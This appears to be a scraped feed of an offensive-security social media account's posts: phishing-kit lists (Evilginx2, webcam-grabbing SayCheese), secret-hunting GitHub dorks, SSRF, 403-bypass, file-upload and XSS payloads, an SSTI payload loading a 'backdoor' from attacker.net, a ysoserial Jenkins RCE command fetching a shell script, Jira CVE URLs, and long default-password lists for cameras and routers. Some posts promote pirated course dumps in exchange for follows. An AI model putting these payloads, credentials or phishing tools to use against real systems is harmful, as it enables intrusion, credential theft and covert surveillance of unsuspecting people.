"β π TOP [--] PHISHING TOOLS TO USE IN [----] π @TheStarkArmyX π Setoolkit - π SocialFish - π HiddenEye - π Evilginx2 - π SeeYou - (Get Location using phishing attack) - π SayCheese - (Grab target's Webcam Shots) - π QR Code Jacking - π ShellPhish - π BlackPhish - https://github.com/iinc0gnit0/BlackPhish https://github.com/An0nUD4Y/shellphish https://github.com/cryptedwolf/ohmyqr https://github.com/hangetzzu/saycheese https://github.com/Viralmaniar/I-See-You https://github.com/kgretzky/evilginx2 https://github.com/DarkSecDevelopers/HiddenEye-Legacy https://github.com/UndeadSec/SocialFish"
X Link 2024-01-14T02:07Z 32.7K followers, 52K engagements
"Some Shodan Dorks that might useful in Bug Bounty. [--]. org:"http://target. com" [--]. http.status:"status_code" [--]. product:"Product_Name" [--]. port:Port_Number Service_Message [--]. port:Port_Number Service_Name [--]. http.component:"Component_Name" [--]. http.component_category:"Component_Category [--]. http.waf:"firewall_name" [--]. http.html:"Name" [--]. http.title:"Title_Name" [--]. ssl.alpn:"Protocol" [--]. http.favicon.hash:"Favicon_Hash" [--]. net:"Net_Range" (for e.g. 104.16.100.52/32) [--]. .com" [--]. asn:"ASnumber" [--]. hostname:"hosthame" [--]. ip:"IP_Address" [--]. all:"Keyword" [--]. Set-Cookie: phpMyAdmin 20."
X Link 2024-01-14T14:28Z 32.7K followers, 22.1K engagements
"Burp Suite [---] For Beginnersπ₯ #1 - Introduction and Installation: π #2 - Understanding Navigation Dashboard Configuration: #3 - Exploring Burp Proxy and Target Specification: #4 - Exploring Burp Repeater and Burp Comparer: #5 - Going deep Into intruder: http://hacklido.com/blog/631 http://hacklido.com/blog/628 http://hacklido.com/blog/625 http://hacklido.com/blog/624 http://hacklido.com/blog/621 http://hacklido.com/blog/631 http://hacklido.com/blog/628 http://hacklido.com/blog/625 http://hacklido.com/blog/624 http://hacklido.com/blog/621"
X Link 2024-01-18T03:47Z 32.7K followers, 49.3K engagements
"OSCP certification* 1.Networking Basics: IP & MAC addresses. TCP UDP ports & protocols. OSI model understanding. IP subnetting. 2.Linux Essentials: Kali Linux overview. File system navigation. User privileges. Bash scripting. Intro to Python. 3.Web Attacks: SQL injection. Broken authentication. Sensitive data exposure. XML external entities. Access control flaws. Security misconfigurations. Cross-site scripting. Insecure deserialization. Using vulnerable components. Insufficient logging. Directory: SMB relays. IPv6 DNS takeover. Pass-The-Hash attacks. Token impersonation. Kerberoasting. GPP &"
X Link 2024-01-21T04:31Z 32.7K followers, 101.4K engagements
"π Linux Privileges Escalation Techniques (Basic to Advanced) Series π π Part 1: π Part 2: π Part 3: π Part 4: π Part 5: #OSCP #oscp https://hacklido.com/blog/286 http://hacklido.com/blog/224 http://hacklido.com/blog/210 http://hacklido.com/blog/162 http://hacklido.com/blog/158 https://hacklido.com/blog/286 http://hacklido.com/blog/224 http://hacklido.com/blog/210 http://hacklido.com/blog/162 http://hacklido.com/blog/158"
X Link 2024-01-22T06:13Z 32.7K followers, 34.4K engagements
"Bug Bounty Tips πππππππ SSRF on Steroids π₯π₯βββββ Methodology Step 1: Subdomain Enumeration DNS Dumpster Sublist3r Amass Google Dorking Certificate Transparency Logs subdomainer Step 2: Find Live Domains cat all-domains.txt httpx all-live.txt Step 3: Identify All URLs cat all-live.txt gauplus -subs -b pngjpggifjpegswfwoffgifsvg -o allUrls.txt Step 4: Injection Burp Collaborator URL in Parameters cat /home/casperino/tools/nuclei/httpx.txt grep "=" ./qsreplace ssrf.txt Step 5: Test for SSRF Vulnerabilities cat ssrf.txt httpx -fr Step 6: How to check which URL is vulnerable split -l 10"
X Link 2024-01-22T22:22Z 32.7K followers, 32K engagements
"Recon Tool: go-dorkπ₯π₯ββ #Day5 Go-dork by dwisiswant0 is a powerful and efficient command-line tool written in the Go programming language. It is designed to be the fastest dork scanner available streamlining the process of conducting advanced Google dork queries. The tool supports various search engines including Google Shodan Bing DuckDuckGo and Yahoo. It also provides an array of flags and options for customization allowing users to tailor their searches based on specific criteria. This makes it an indispensable asset for security researchers bug bounty hunters and penetration testers."
X Link 2024-02-02T20:39Z 32.7K followers, 24.6K engagements
"π§π«-- #Day9 πAll open source resources Awesome Red Team Ops :- Awesome Red Teaming :- Awesome Red Team ToolKit :- Awesome Blue Team Ops :- Awesome OSINT :- Awesome DevSecOps :- Awesome Pentest :- Awesome Cloud Pentest :- Awesome Shodan :- Awesome AWS Security :- Awesome Malware Analysis & Reverse Engineering :- Awesome Malware Analysis:- Awesome Computer Forensic :- Awesome Cloud Security :- Awesome Reverse Engineering :- Awesome Threat Intelligence :- Awesome SOC :- Awesome Social Engineering :- Awesome Web Security :- Awesome Forensics :- Awesome API Security :- Awesome WEB3 :- Awesome"
X Link 2024-02-09T04:28Z 32.7K followers, 33.4K engagements
"π₯π₯Github-Dorkπππ₯π₯ Happy Hunting π api_key π app_AWS_SECRET_ACCESS_KEY π app_secret π authoriztion π Ldap π aws_access_key_id π secret π bash_history π bashrc%20password π beanstalkd π client secre π composer π config π credentials π DB_PASSWORD π dotfiles π .env file π .exs file π extension:json π extension:pem%20private π extension:ppk private π extension:sql mysql dump π extension:yaml π .mlab.com password π mysql π npmrc%20_auth π passwd π passkey π password π s3cfg π send_key π token π filename:.bash_history π filename:.bash_profile aws π"
X Link 2024-03-23T05:27Z 32.7K followers, 26.4K engagements
"Basic SSRF v1 http://127.0.0.1:80 http://127.0.0.1:443 http://127.0.0.1:22 http://0.0.0.0:80 http://0.0.0.0:443 http://0.0.0.0:22 Basic SSRF Alternative version http://localhost:80 http://localhost:443 http://localhost:22 Advanced exploit using a redirection [--]. Create a subdomain pointing to 192.168.0.1 with DNS A record [--]. Launch the SSRF: will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 Advanced exploit using type=url Change "type=file" to "type=url" Paste URL in text field and hit enter Using this vulnerability users can upload images from any image URL = trigger an SSRF"
X Link 2024-04-04T08:35Z 32.7K followers, 32.6K engagements
"# Bypass [---] (Forbidden) [--]. Using "X-Original-URL" header GET /admin HTTP/1.1 Host: Try this to bypass GET /anything HTTP/1.1 Host: X-Original-URL: /admin [--]. Appending %2e after the first slash = [---] Try this to bypass = [---] [--]. Try add dot (.) slash (/) and semicolon (;) in the URL = [---] Try this to bypass = [---] = [---] = [---] = [---] = [---] = [---] [--]. Add ".;/" after the directory name Try this to bypass [--]. Try to uppercase the alphabet in the url Try this to bypass [--]. Via Web Cache Poisoning GET /anything HTTP/1.1 Host: X-Original-URL: /admin ## Tools * Bypass-403 Go script for bypassing"
X Link 2024-04-05T11:27Z 32.7K followers, 29.5K engagements
"Happy Hunting Curated collection of powerful one-liners tailored for bug bounty hunting crafted with β₯ by the community. Contribute and enhance your bounty hunting arsenal ## Quick Guide - HOST: Refers to a single hostname domain or IP address. - HOSTS.txt: Contains multiple hosts. - URL: Represents a URL starting with HTTP/HTTPS. - URLS.txt: Contains multiple URLs. - FILE.txt: or FILEN.txt: File(s) needed for command/script execution. - OUT.txt: or OUTN.txt: Target storage for results. --- ### Local File Inclusion @dwisiswant0 bash gau HOST gf lfi qsreplace"
X Link 2024-04-07T08:58Z 32.7K followers, 33.8K engagements
"File Upload Bypass -ππ Blacklisting Bypass PHP .php .php2 .php3 .php4 .php5 .php6 .php7 .phps .phps .pht .phtm .phtml .pgif .shtml .htaccess .phar .inc .hphp .ctp .module ASP .asp .aspx .config .ashx .asmx .aspq .axd .cshtm .cshtml .rem .soap .vbhtm .vbhtml .asa .cer .shtml Jsp .jsp .jspx .jsw .jsv .jspf Coldfusion .cfm .cfml .cfc .dbm Perl .pl .cgi Using random capitalization .pHp .pHP5 .PhAr Whitelisting Bypass file.png.php file.png.Php5 file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php. file. file.php. file.pHp5. file.png.php file.png.pHp5 file.php#.png"
X Link 2024-04-14T10:26Z 32.7K followers, 31.9K engagements
"Happy Huntingπππ¨π¨ SSTI (Server Side Template Injection) Generic $%%'"%. % debug % 77 '7'7 2277 %= [--] * [--] % #33 # [--] * [--] 33 $22 @(33) $= 33 = 77 $77 #77 =7*7 request self dump(app) .class.base.subclassesO ''.class.mro()l .subclassesO for c in [---] % ccc % endfor % ._class.base.subclasses_O 'cat%20/etc/passwd'filter('system') PHP phpprint "Hello"/php php$s = file_get_contents('/etc/passwd'NULL NULL [--] 100); var_dump($s);/php dump(app) app.request.server.alljoin('') "'/etc/passwd'file_excerpt(130)"@ _self.env.setCache("ftp://attacker.net:2121")_self.env.loadTemplate("backdoor")"
X Link 2024-04-14T10:27Z 32.7K followers, 32.5K engagements
"The Complete Ethical Hacking Course Beginner to Advanced. "π Excited to announce 'The Complete Ethical Hacking Course - Beginner to Advanced' π Uncover the secrets of cybersecurity master penetration testing and become a pro ethical hacker. π»π‘ Join the cybersecurity revolution #EthicalHacking #Cybersecurity #TechYou" 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) π₯ [--]. Like and Repost [--]. Send me a private message and comment Send to receive your copies π "I do not own this content. For any issues or concerns please contact the rightful owner directly.""
X Link 2024-05-03T11:15Z 32.7K followers, 113.9K engagements
"Offensive Security notes π₯π’ Welcome to the Linux Privilege Escalation Guide within my OSCP (Offensive Security Certified Professional) notes. πππ "Access to my OSCP Linux Privilege Escalation notes is limited to a select group. First [-----] people are eligible to receive access to OSCP Notes If you'd like to receive these notes please πfollow me πrepost and drop πYes and send me a private direct message. This offer is exclusively for verified users not new accounts." In this comprehensive resource we will explore the intricacies of escalating privileges on Linux systems providing you"
X Link 2024-05-20T04:22Z 32.7K followers, 105.9K engagements
"πWordlists specially for API routes fuzzing https://wordlists-cdn.assetnote.io/data/automated/ https://wordlists-cdn.assetnote.io/data/automated/"
X Link 2024-09-19T04:35Z 32.7K followers, 31.2K engagements
"Recon Tool: Argus Argus developed by jasonxtn is an all-in-one toolkit designed to simplify information gathering and reconnaissance tasks. It has a user-friendly interface a suite of powerful modules and enables efficient and thorough exploration of networks web applications and security configurations. Read the post: Installation To get started with Argus follow these simple steps: git clone cd argus pip install -r requirements.txt Once installed you can launch Argus with: python #reconnaissance #hacking #infosec #informationsecurity #cybersecurity #securityassessment http://argus.py"
X Link 2024-10-12T22:02Z 32.7K followers, 29.4K engagements
"Offensive Security Tool: TerminatorZ TerminatorZ is developed by Chris Abou-Chabk from Black Hat Ethical Hacking and is an efficient web security tool designed to scan for potential vulnerabilities in your web applications. It uses a combination of advanced techniques and popular tools like 'waybackurls' and 'curl' to perform passive and quick scans providing a rapid overview of potential issues. The results are displayed in an easy-to-read format in the terminal with only the vulnerable findings saved for further investigation. π’New Version [---] Released This update includes [--] NEW Proofs of"
X Link 2024-10-13T18:54Z 32.7K followers, 80.1K engagements
"Offensive Security Tool: SQLMutant SQLMutant is written by Chris Abou-Chabk from Black Hat Ethical Hacking and its a comprehensive SQL injection tool. It uses a variety of techniques to detect vulnerabilities including pattern matching error analysis and timing attacks ensuring that no stone is left unturned. In addition to its powerful features SQLMutant also integrates with Waybackurls and Arjun enabling it to find even more parameters and merge all results together. This integration is highly beneficial as it provides automated subdomain enumeration and SQL injection testing capabilities."
X Link 2024-10-15T16:36Z 32.7K followers, 44K engagements
"Welcome to the Linux Privilege Escalation Guide within my OSCP (Offensive Security Certified Professional) notes. πππ @TheMsterDoctor1 OSCP Linux Privilege Escalation Notes https://medium.com/@TheMsterDoctor1/welcome-to-the-linux-privilege-escalation-guide-within-my-oscp-offensive-security-certified-88bc5d167330 https://medium.com/@TheMsterDoctor1/welcome-to-the-linux-privilege-escalation-guide-within-my-oscp-offensive-security-certified-88bc5d167330"
X Link 2024-12-04T03:21Z 32.7K followers, 24.6K engagements
"Advanced Guide to Detecting and Exploiting SQL Injection Introduction: In this guide well delve into a more advanced method for detecting SQL Injection vulnerabilities and efficiently exploiting them using SQLMap. This approach will help identify vulnerable endpoints more accurately and allow for precise exploitation targeting various databases. Step 1: Automating SQL Injection Discovery To streamline the process of identifying SQL Injection points well use a powerful combination of tools and commands: Command: echo "http://target/" gau uro grep "" sed "s/=.*/=A'/" uniq params.txt; cat"
X Link 2025-04-04T04:15Z 32.7K followers, 33.3K engagements
"From Upload to Shell: Advanced RCE Techniques via File Extensions PHP Uploads and SSTI Exploitation 1/25 Advanced Thread How I escalated three common web app features into full Remote Code Execution: injection via filename extension 2.Arbitrary PHP file upload 3.SSTI with Jinja2 using subclass traversal All exploitable in the wild. Full payloads included. #RCE #BugBounty #SSTI #InfoSec #CTF 2/25 Lets start with the most overlooked injection point in web apps: The file extension. Seems harmless right But heres how I used it to inject shell commands in a real-world PHP app. 3/25 Vulnerable PHP"
X Link 2025-04-13T05:44Z 32.7K followers, 35K engagements
"β I Built the Largest GitHub Dorks Arsenal Ever: 100000+ Queries for Secrets Hunting. No paywall. No bullshit. Just pure recon fuel. These dorks can uncover: AWS Keys Stripe Tokens GitHub Deploy Secrets GCP Service Accounts DB creds JWTs and more Heres how to use them & the download: 𧡠[--]. Most people use [---] basic dorks. I compiled 100000+ high-signal GitHub + Google dorks optimized for: .env config.js Authorization: client_secret jwt_secret and more This is Codebase OSINT on steroids. [--]. These dorks are structured for: GitHub API queries Google Hacking Regex hunters Secret scanning tools"
X Link 2025-05-11T02:35Z 32.7K followers, 45.1K engagements
"π§ π£ [---] FILES. 200+ GB. ELITE ONLY. I just unlocked a vault that would make even top bug bounty hunters drop everything: π₯ OSCP π₯ OSEP π₯ OSWE π₯ THM / HTB π₯ EC-Council π₯ Cisco CyberOps π₯ Linux Priv Esc π₯ PEN-300 Full Video Series π₯ BloodHound AD SSH API SQL π₯ PEN-300 / HTB / THM π₯ EC-Council / CyberOps / Linux PrivEsc π₯ BloodHound / AD / API / SSH / SQL πΎ FULL videos PDFs labs @GREEN_ARMOR zips Too hot to share publicly. Ill pick ONLY [--] people to send this to we can get banned for this π₯ π Repost + Like + Comment ME Ill DM you if youre chosen. This is NOT your regular course"
X Link 2025-06-18T04:42Z 32.7K followers, 84.7K engagements
"π¨ [--] COMMAND TO OWN AN ENTIRE NETWORK π§ Advanced Nmap Recon + Grep Filtering + Banner Fingerprinting nmap -n -Pn -sS -sV -p80 --open --script=banner -T5 192.168.1.0/24 -oG - grep 'open' grep -v 'tcpwrapped' β
Fast β
Silent β
Filters noise β
IDs Apache IIS embedded cams routers and more π‘ Try replacing -p80 with -p- for full port sweep π‘ Add --script=http-title or --script=http-headers to pull juicy intel π₯ Powered by Kali Linux. Used by real hunters. #BugBounty #HackerLife #Cybersecurity #Nmap #Infosec #KaliLinux #OSINT #RedTeam #Python #Linux #WebSecurity #CTF #ReconGods Optional Dark"
X Link 2025-06-24T19:31Z 32.7K followers, 184.4K engagements
"π· Due to overwhelming demand from my last post Ive decided to publicly drop the OSCP [----] Linux Privilege Escalation Notes for everyone π·π· π· These notes cover advanced privilege escalation techniques tailored for real-world pentesting and OSCP exam prep from enumeration to exploitation. π· Grab them here no DM required: π· π· If you found this valuable: π· Repost to help others π· Like if youre studying OSCP or hacking π· Comment your favorite trick or ask a question I see you all and I appreciate the insane support. Lets keep leveling up together. π·π· #OSCP #PrivilegeEscalation"
X Link 2025-06-27T22:57Z 32.7K followers, 49K engagements
"π§ π₯ 99% of hackers QUIT when they see a [---] But the 1% They try this: π I found a [---] Forbidden on /admin. But then I tried: POST /admin X-Original-URL: /admin /admin.;/ %2e/admin X-Rewrite-URL: /admin /ADMIN (yes just caps) /;/admin /.;/admin πππ π₯ [--]. Protocol-Level Downgrade Bypass (only works on dual-stack apps) Target running HTTP/2 or gRPC Force downgrade: PRI * HTTP/2.0 SM GET /admin HTTP/1.1 π§ Some WAFs dont parse dual-layer protocols correctly backend sees a clean HTTP/1.1. 𧬠[--]. Content-Length Collapsing on HTTP Pipelining Send pipelined requests where only 1st is parsed by"
X Link 2025-07-04T02:27Z 32.7K followers, 40.4K engagements
"EXPOSED: 200+ AI Agents have been LEAKED. These Agents SELL for $5000+ per build and cover 20+ industries. Inside the file youll get: Social Media Agents ($8k+) Creative Content Agents ($3k+) Cold outreach Agents ($3k+) Lead Booking Agents ($6k+) Customer support agents ($5k+) Data & Scraping Agent ($8k+) Lead qualification agents ($4k+) Productivity HR Analytics DevOps & legal Agents also 100s of plug & play systems that save you time AND money. Follow + RT + Comment AGENTS and Ill send you the drive for FREE BONUS: An n8n Masterclass so you know how to run customize and scale every"
X Link 2025-07-05T09:50Z 32.7K followers, 62.9K engagements
"Anyone Can Access Your CCTV CAMERAS β π· CamXploit v2.0.1 Find analyze and check for exposed IP cameras with open ports known vulnerabilities and weak login credentials. Run Online: GitHub: What's New in v2.0.1 Massive port scan: Now scans 1000+ ports including custom and high camera ports CP Plus (CP-UVR-0401E1-IC2) and DVR/NVR detection Enhanced live stream detection (RTSP/HTTP/RTMP/MMS with real stream validation) Multi-threaded authentication and password brute-force (much faster) Improved camera indicator analysis (brand model login forms titles) https://lnkd.in/erqEsRBD"
X Link 2025-07-24T02:20Z 32.7K followers, 93.2K engagements
"Live bug bounty videos https://mega.nz/folder/dglxGayI#eNDIntBvDE2alSCVILA9eA https://mega.nz/folder/dglxGayI#eNDIntBvDE2alSCVILA9eA"
X Link 2025-10-03T07:08Z 32.7K followers, 69.8K engagements
"π Unlock the secrets of the web with "The Art of Web Reconnaissance: Bug Bounty & Ethical Hacking" ππ» π What you'll learn: - Advanced web reconnaissance techniques - Identifying and exploiting vulnerabilities - Best practices for ethical hacking - Real-world bug bounty hunting tips Course link : #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp https://mega.nz/folder/Qn5CibIC#JRmgMNgy9BqjrVNBq6VyUQ"
X Link 2025-10-06T01:45Z 32.7K followers, 28.2K engagements
"π» FREE ETHICAL HACKING COURSE Become a Cybersecurity Expert π Ready to level up your hacking skills (ethically) Heres a complete structured course step-by-step from beginner to advanced: π Modules included: [--] Introduction to Ethical Hacking [--] Building Your Penetration Testing Lab [--] Information Gathering (Reconnaissance) [--] Scanning & Enumeration [--] Vulnerability Assessment [--] Understanding Firewalls [--] Web Application Penetration Testing (Full Section [--] Files π₯) [--] Denial of Service (DoS) Attacks [--] Malware Threats π Social Engineering [--] Cryptography Essentials [--] Writing a Professional"
X Link 2025-10-08T00:58Z 32.7K followers, 26.6K engagements
"# π― Advanced JavaScript Reconnaissance Framework - From Basic Enum to $50K+ Critical Findings ----- ## π₯ The Problem with Basic JS Reconnaissance Everyone runs the same 6-step workflow. You get the same results as [-----] other researchers. This is why youre missing critical vulnerabilities. Heres how elite researchers weaponize JS analysis for maximum bounty potential: ----- ## 𧬠Phase 1: Multi-Dimensional Subdomain Intelligence bash # Don't just enumerate - BUILD AN ATTACK GRAPH DATE=$(date +%Y%m%d_%H%M%S) # Layer 1: Aggressive Multi-Source Discovery subfinder -d $TARGET -all"
X Link 2025-12-29T07:06Z 32.6K followers, [----] engagements
"# Download JS with correlation tracking mkdir -p js_files cat js_metadata.json jq -r '.url' while read url; do hash=$(echo $url sha256sum cut -d' ' -f1 cut -c1-16) curl -sk "$url" -o "js_files/$hash.js" echo "$url$hash.js" js_mapping.txt done ----- ## π¬ Phase 5: Multi-Engine Secret & Vulnerability Discovery bash # Don't just run one tool - CREATE A SECRET DETECTION PIPELINE # Engine 1: JSScanner for common patterns cat js_metadata.json jq -r '.url' jsceret secrets_jsceret.txt # Engine 2: Trufflehog for high-entropy secrets trufflehog filesystem js_files/ --json --no-verification"
X Link 2025-12-29T07:06Z 32.6K followers, [----] engagements
"π¨ [--] COMMAND TO MAP A NETWORK (AUTHORIZED TESTING) π§ Advanced Nmap Recon + Grep Filtering + Banner Fingerprinting nmap -n -Pn -sS -sV -p80 --open --script=banner -T5 192.168.1.0/24 -oG - grep 'open' grep -v 'tcpwrapped' π§ Nmap recon + service fingerprinting + clean filtering (no fluff) nmap -n -Pn -sS -sV --version-all -p80 --open --script=bannerhttp-titlehttp-server-header --reason --stats-every 10s -T4 192.168.1.0/24 -oG - awk '/Up$/ip=$2 /80/open/print ip " " $0' grep -v 'tcpwrapped' β
Fast discovery β
Only shows live hosts + open [--] β
Pulls titles + server headers + banners"
X Link 2026-01-10T23:56Z 32.3K followers, 75.6K engagements
"π₯Recon is where most bounties are won. πArgus is a Python-powered toolkit built for serious hunters: Faster intel Cleaner signals Better targets Stop guessing. Start seeing. π¦
https://github.com/jasonxtn/argus https://github.com/jasonxtn/argus"
X Link 2026-01-18T19:20Z 32.3K followers, 21.1K engagements
"## Jenkins [--]. Deserialization RCE in old Jenkins (CVE-2015-8103 Jenkins [-----] and older) Use to generate a payload. Then RCE using this script(./rce/jenkins_rce_cve-2015-8103_deser.py): bash java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' payload.out ./jenkins_rce.py jenkins_ip jenkins_port payload.out [--]. Authentication/ACL bypass (CVE-2018-1000861 Jenkins 2.150.1) Details If the Jenkins requests authentication but returns valid data using the following request it is vulnerable: bash curl -k [---] -s [--]. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000"
X Link 2026-01-22T04:37Z 31.4K followers, [----] engagements
"# Unauthenticated Jira CVEs [--]. CVE-2017-9506 (SSRF) https://JIRA_URL/plugins/servlet/oauth/users/icon-uriconsumerUri=SSRF_PAYLOAD [--]. CVE-2018-20824 (XSS) https://JIRA_URL/plugins/servlet/Wallboard/dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) [--]. CVE-2019-8451 (SSRF) https://JIRA_URL/plugins/servlet/gadgets/makeRequesturl=https://HOST_NAME:1337@example.com [--]. CVE-2019-8449 (User Information Disclosure) https://JIRA_URL/rest/api/latest/groupuserpickerquery=1&maxResults=50000&showAvatar=true [--]. CVE-2019-8442 (Sensitive Information Disclosure)"
X Link 2026-01-22T04:37Z 31.7K followers, [----] engagements
"101. Atlassian Confluence (old installs) User: admin Password: admin [---]. Atlassian Jira (pre-hardening) User: admin Password: admin [---]. Axis IP Cameras (OEM firmware) User: root Password: pass [---]. Bosch IP Cameras (older firmware) User: service Password: service [---]. Cambium Networks cnPilot User: admin Password: admin [---]. Cisco UCS Manager (factory) User: admin Password: password [---]. Cisco Prime Infrastructure User: admin Password: admin [---]. Citrix ADC (secondary account) User: nsmaint Password: nsmaint [---]. Dell OpenManage User: root Password: root [---]. Elastic Beats (legacy) User:"
X Link 2026-01-23T06:25Z 31.9K followers, [----] engagements
"201. Cisco IOS XE (ROMMON / recovery) User: cisco Password: cisco [---]. Huawei ONU / CPE (ISP OEM) User: telecomadmin Password: admintelecom [---]. ZTE CPE (ISP field support) User: root Password: Zte521 [---]. TP-Link ISP firmware User: support Password: support [---]. MikroTik OEM (ISP images) User: support Password: support [---]. Ubiquiti AirOS (older) User: ubnt Password: ubnt Storage / Datacenter Gear [---]. NetApp (maintenance mode) User: diag Password: diag [---]. Dell EMC Unity (service) User: service Password: service [---]. IBM Storwize User: superuser Password: passw0rd [---]. HPE 3PAR (legacy)"
X Link 2026-01-23T06:28Z 31.4K followers, [----] engagements
"This is it. Clawdbot has gone viral and for good reason. Here's a full explanation of what it is how to use it and yes even its shortcomings. You need to watch this"
X Link 2026-01-26T16:14Z 32.2K followers, 16.2K engagements
"π» FREE ETHICAL HACKING COURSE Become a Cybersecurity Expert π Ready to level up your hacking skills (ethically) Heres a complete structured course step-by-step from beginner to advanced: π Modules included: [--] Introduction to Ethical Hacking [--] Building Your Penetration Testing Lab [--] Information Gathering (Reconnaissance) [--] Scanning & Enumeration [--] Vulnerability Assessment [--] Understanding Firewalls [--] Web Application Penetration Testing (Full Section [--] Files π₯) [--] Denial of Service (DoS) Attacks [--] Malware Threats π Social Engineering [--] Cryptography Essentials [--] Writing a Professional"
X Link 2026-01-27T06:13Z 32.2K followers, 16K engagements
"Quick tip to find reflected xss: 1- python3 --domain 2- cat kxss grep " " tee unfiltered_param.txt 3- inject simple xss payload: "img src=x onerror=alert("XSS") - Payloads π° style@keyframes abanimation:a;/styleb/onanimationstart=prompt$document.domain marquee+loop=1+width=0+onfinish='new+Functionalert1' d3v/onauxclick=2.some(confirm)click x onauxclick=a=alerta(domain)click q=1" type=image src=x oneror="alert (alert') --svg+onload=%27top%2fal%2f%2esource%2b%2fert%2f%2esource(document.cookie)%27 (Chrome only) id=1&id=2 input value="12" id="&id=onpointerrawupdate="a=confirm&id=a(1) input"
X Link 2026-01-28T05:30Z 32.3K followers, 13.7K engagements
"π¨ Hot take: If youre still broke in [----] you chose comfort over discipline. I have 50+ full courses saved on: Ethical Hacking Digital Marketing SEO (Beginner Advanced) Amazon FBA / VA Shopify Dropshipping Freelancing (Upwork & Fiverr) AI Content & Prompt Engineering Web & Graphic Design Copywriting YouTube Automation Affiliate Marketing All FREE or easily accessible. The problem isnt money. The problem is: β scrolling β excuses β starting Monday Pick ONE skill. Lock in for [--] days. Go ghost. Come back different. No motivation. No vibes. Just execution. π₯ Want the links Say DROP IT in the"
X Link 2026-02-01T05:16Z 31.7K followers, [----] engagements
"I'm a Hacker. I attend DEF CON every year. We play a fun game called "Spot the Fed". Last week the Department of Justice released three million pages of Epstein documents. I read them professionally. Not for the names. For the tradecraft. The tradecraft is immaculate. But here's what made me put down my coffee. An FBI informant told authorities in [----] that Epstein had a "personal hacker." An Italian. Born in the southern region of Calabria. I've met hackers from Calabria. At DEF CON. At Black Hat. The informant said this hacker developed zero-day exploits. For iOS. For BlackBerry. For"
X Link 2026-02-02T04:22Z 31.7K followers, [----] engagements
"I'm a Hacker. I attend DEF CON every year. We play a fun game called "Spot the Fed". Last week the Department of Justice released three million pages of Epstein documents. I read them professionally. Not for the names. For the tradecraft. The tradecraft is immaculate. But here's what made me put down my coffee. An FBI informant told authorities in [----] that Epstein had a "personal hacker." An Italian. Born in the southern region of Calabria. I've met hackers from Calabria. At DEF CON. At Black Hat. The informant said this hacker developed zero-day exploits. For iOS. For BlackBerry. For"
X Link 2026-02-02T14:24Z 32K followers, [----] engagements
"π¨ STOP SCROLLING π¨ Most people will never realize this π Lifetime Learning Access π₯ 27700+ VIDEO COURSES π» Skills that actually make money in [----] This is NOT school. This is NOT theory. This is real-world income education. You get access to everything: β
Print on Demand β
YouTube Automation β
Affiliate Marketing β
SEO β
Email Marketing β
Funnel Building β
Forex Trading β
Investing & Debt Management β
Crowdfunding β
E-commerce β
Crypto Basics and much more. No monthly fees. No subscriptions. No excuses. People who win in [----] are learning quietly while others are scrolling. If youre"
X Link 2026-02-03T05:10Z 32K followers, [----] engagements
Limited data mode. Full metrics available with subscription: lunarcrush.com/pricing